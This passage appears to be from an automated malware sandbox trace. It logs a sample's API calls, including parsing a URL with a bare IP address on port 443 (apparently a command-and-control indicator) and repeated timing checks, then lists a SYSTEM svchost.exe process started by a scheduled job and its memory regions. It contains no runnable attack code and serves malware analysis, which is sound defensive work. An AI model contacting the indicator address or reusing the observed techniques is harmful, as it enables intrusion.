(lpFirst="http://91.191.55.135:443\r\n\r\n", lpSrch="") returned="\r\n\r\n" [0190.414] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60e106, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0190.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x617b90 [0190.414] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60e106, cbMultiByte=24, lpWideCharStr=0x617b90, cchWideChar=24 | out: lpWideCharStr="http://91.191.55.135:443") returned 24 [0190.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x615c20 [0190.414] RtlFreeHeap (HeapHandle=0x530000, Flags=0x8, BaseAddress=0x617b90) returned 1 [0190.414] StrStrA (lpFirst="\r\n\r\n", lpSrch="") returned 0x0 [0190.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x30) returned 0x618320 [0190.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x615ae0 [0190.414] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] GetTickCount () returned 0xe990e8 [0190.415] ResetEvent (hEvent=0x8) returned 1 [0190.416] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 142 os_tid = 0x9cc Thread: id = 143 os_tid = 0x1388 [0190.230] Sleep (dwMilliseconds=0xbb8) Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x75adc000" os_pid = "0x358" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_scheduled_job" parent_id = "2" os_parent_pid = "0x210" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ae96" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2143 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2144 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2145 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2146 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2147 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2148 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2149 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2150 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2151 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2152 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2153 start_va = 0x7ff759210000 end_va = 0x7ff75921cfff monitored = 0 entry_point = 0x7ff759213980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2154 start_va = 0x7fffb5030000 end_va = 0x7fffb51f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2271 start_va = 0x160000 end_va = 0x166fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2272 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2273 start_va = 0x7fffb1b20000 end_va = 0x7fffb1d07fff monitored = 0 entry_point = 0x7fffb1b4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2274 start_va = 0x7fffb3fa0000 end_va = 0x7fffb404cfff monitored = 0 entry_point = 0x7fffb3fb81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2275 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2276 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2277 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2278 start_va = 0x7fffb4050000 end_va = 0x7fffb40aafff monitored = 0 entry_point = 0x7fffb40638b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2279 start_va = 0x7fffb42d0000 end_va = 0x7fffb43ebfff monitored = 0 entry_point = 0x7fffb43102b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2280 start_va = 0x170000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2281 start_va = 0x7fffb07f0000 end_va = 0x7fffb08e3fff monitored = 0 entry_point = 0x7fffb07fa960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2282 start_va = 0x7fffb4860000 end_va = 0x7fffb4adcfff monitored = 0 entry_point = 0x7fffb4934970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2283 start_va = 0x7fffb3a90000 end_va = 0x7fffb3b2cfff monitored = 0 entry_point = 0x7fffb3a978a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2284 start_va = 0x7fffb1ab0000 end_va = 0x7fffb1b19fff monitored = 0 entry_point = 0x7fffb1ae6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2285 start_va = 0x5c0000 end_va = 0x776fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2286 start_va = 0x780000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 2287 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 2288 start_va = 0x5c0000 end_va = 0x69cfff monitored = 0 entry_point = 0x61e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2289 start_va = 0x770000 end_va = 0x776fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 2290 start_va = 0x7fffb16d0000 end_va = 0x7fffb16defff monitored = 0 entry_point = 0x7fffb16d3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2291 start_va = 0x7fffb4700000 end_va = 0x7fffb4855fff monitored = 0 entry_point = 0x7fffb470a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2292 start_va = 0x7fffb3b40000 end_va = 0x7fffb3cc5fff monitored = 0 entry_point = 0x7fffb3b8ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2293 start_va = 0x5c0000 end_va = 0x747fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2294 start_va = 0x900000 end_va = 0xa80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 2295 start_va = 0xa90000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 2296 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2297 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 2298 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2299 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 2300 start_va = 0xb50000 end_va = 0xf4afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 2301 start_va = 0xf50000 end_va = 0x1146fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 2302 start_va = 0x1150000 end_va = 0x134ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 2303 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2304 start_va = 0xf50000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 2305 start_va = 0x1140000 end_va = 0x1146fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 2306 start_va = 0x7fffae810000 end_va = 0x7fffae95cfff monitored = 0 entry_point = 0x7fffae853da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 2307 start_va = 0x7fffb00c0000 end_va = 0x7fffb00cbfff monitored = 0 entry_point = 0x7fffb00c2480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 2308 start_va = 0x7fffae7d0000 end_va = 0x7fffae7e7fff monitored = 0 entry_point = 0x7fffae7d5910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2309 start_va = 0x7fffae7c0000 end_va = 0x7fffae7c9fff monitored = 0 entry_point = 0x7fffae7c1660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 2310 start_va = 0x7fffb2460000 end_va = 0x7fffb2520fff monitored = 0 entry_point = 0x7fffb2480da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2311 start_va = 0x1300000 end_va = 0x1442fff monitored = 0 entry_point = 0x1328210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2312 start_va = 0x1300000 end_va = 0x1406fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 2313 start_va = 0x1410000 end_va = 0x160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 2314 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 2315 start_va = 0x1600000 end_va = 0x1936fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2316 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 2317 start_va = 0x1400000 end_va = 0x1406fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 2318 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 2319 start_va = 0x7fffb3e50000 end_va = 0x7fffb3ef6fff monitored = 0 entry_point = 0x7fffb3e5b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2320 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 2321 start_va = 0x7fffac280000 end_va = 0x7fffac33efff monitored = 0 entry_point = 0x7fffac2a1c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 2322 start_va = 0x1940000 end_va = 0x1a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 2323 start_va = 0x7fffac180000 end_va = 0x7fffac27bfff monitored = 0 entry_point = 0x7fffac1b6df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 2324 start_va = 0x7fffac130000 end_va = 0x7fffac170fff monitored = 0 entry_point = 0x7fffac147eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 2325 start_va = 0x7fffb14c0000 end_va = 0x7fffb14d8fff monitored = 0 entry_point = 0x7fffb14c5e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 2326 start_va = 0xf50000 end_va = 0x10e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 2327 start_va = 0x1a40000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 2328 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 2329 start_va = 0x7fffb08f0000 end_va = 0x7fffb0938fff monitored = 0 entry_point = 0x7fffb08fa090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 2330 start_va = 0x7fffb1670000 end_va = 0x7fffb16bafff monitored = 0 entry_point = 0x7fffb16735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2331 start_va = 0x7fffac110000 end_va = 0x7fffac120fff monitored = 0 entry_point = 0x7fffac113320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2332 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 2333 start_va = 0x7fffb12d0000 end_va = 0x7fffb12fcfff monitored = 0 entry_point = 0x7fffb12e9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2334 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2335 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2336 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 2337 start_va = 0x7fffb14e0000 end_va = 0x7fffb1508fff monitored = 0 entry_point = 0x7fffb14f4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2338 start_va = 0x780000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 2339 start_va = 0xf50000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 2340 start_va = 0x10e0000 end_va = 0x10e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 2341 start_va = 0x7fffabcb0000 end_va = 0x7fffabd1dfff monitored = 0 entry_point = 0x7fffabcb7f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 2342 start_va = 0x7fffb0b40000 end_va = 0x7fffb0b70fff monitored = 0 entry_point = 0x7fffb0b47d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2343 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 2344 start_va = 0x1050000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 2345 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 2346 start_va = 0x7fffabbe0000 end_va = 0x7fffabc0efff monitored = 0 entry_point = 0x7fffabbe8910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 2347 start_va = 0x7fffb4f80000 end_va = 0x7fffb5026fff monitored = 0 entry_point = 0x7fffb4f958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2348 start_va = 0x7fffabbd0000 end_va = 0x7fffabbdcfff monitored = 0 entry_point = 0x7fffabbd2ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 2349 start_va = 0x1150000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 2350 start_va = 0x1410000 end_va = 0x148ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 2351 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 2352 start_va = 0x7fffabb70000 end_va = 0x7fffabbc4fff monitored = 0 entry_point = 0x7fffabb7fc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 2353 start_va = 0x7fffb1650000 end_va = 0x7fffb1663fff monitored = 0 entry_point = 0x7fffb16552e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2354 start_va = 0x7fffb40b0000 end_va = 0x7fffb411afff monitored = 0 entry_point = 0x7fffb40c90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2355 start_va = 0x7fffb0f20000 end_va = 0x7fffb0f7bfff monitored = 0 entry_point = 0x7fffb0f36f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2356 start_va = 0x7fffab940000 end_va = 0x7fffab966fff monitored = 0 entry_point = 0x7fffab943bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 2357 start_va = 0x7fffb4550000 end_va = 0x7fffb45abfff monitored = 0 entry_point = 0x7fffb456b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2358 start_va = 0x7fffb2530000 end_va = 0x7fffb3a8efff monitored = 0 entry_point = 0x7fffb26911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2359 start_va = 0x7fffb2380000 end_va = 0x7fffb23c2fff monitored = 0 entry_point = 0x7fffb2394b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2360 start_va = 0x7fffb1d10000 end_va = 0x7fffb2353fff monitored = 0 entry_point = 0x7fffb1ed64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2361 start_va = 0x7fffb4f20000 end_va = 0x7fffb4f71fff monitored = 0 entry_point = 0x7fffb4f2f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2362 start_va = 0x7fffb16e0000 end_va = 0x7fffb1794fff monitored = 0 entry_point = 0x7fffb17222e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2363 start_va = 0x7fffb0db0000 end_va = 0x7fffb0dcefff monitored = 0 entry_point = 0x7fffb0db5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2364 start_va = 0x7fffb0a60000 end_va = 0x7fffb0a6bfff monitored = 0 entry_point = 0x7fffb0a627e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2365 start_va = 0x7fffab900000 end_va = 0x7fffab93dfff monitored = 0 entry_point = 0x7fffab90a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 2366 start_va = 0x2100000 end_va = 0x21dcfff monitored = 0 entry_point = 0x215e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2367 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2368 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 2369 start_va = 0x7fffb0650000 end_va = 0x7fffb0673fff monitored = 0 entry_point = 0x7fffb0653260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2370 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 2371 start_va = 0x7fffab6b0000 end_va = 0x7fffab795fff monitored = 0 entry_point = 0x7fffab6ccf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 2372 start_va = 0x7fffac890000 end_va = 0x7fffac9c5fff monitored = 0 entry_point = 0x7fffac8bf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2373 start_va = 0x7fffafcd0000 end_va = 0x7fffafce2fff monitored = 0 entry_point = 0x7fffafcd2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2374 start_va = 0x7fffb1460000 end_va = 0x7fffb14b5fff monitored = 0 entry_point = 0x7fffb1470bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2375 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2376 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 2377 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2378 